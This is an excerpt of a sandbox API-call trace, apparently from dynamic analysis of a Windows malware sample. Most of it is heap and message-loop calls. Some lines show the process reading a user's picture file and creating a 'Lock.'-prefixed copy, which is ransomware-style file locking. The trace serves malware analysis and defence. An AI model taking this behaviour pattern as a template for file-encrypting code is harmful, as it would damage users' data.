HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0254.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0254.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/70BY_GgaY1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\70by_ggay1.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0254.619] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.619] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0254.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.70BY_GgaY1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.70by_ggay1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.620] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.621] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0254.621] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x4c04, lpOverlapped=0x0) returned 1 [0254.623] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0254.625] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c04) returned 0x34a4048 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4048 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.626] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.627] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.627] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0254.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c04) returned 0x34a4048 [0254.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0254.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c04) returned 0x24cc660 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.631] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0254.631] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0254.631] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0254.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0254.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.632] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0254.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.635] 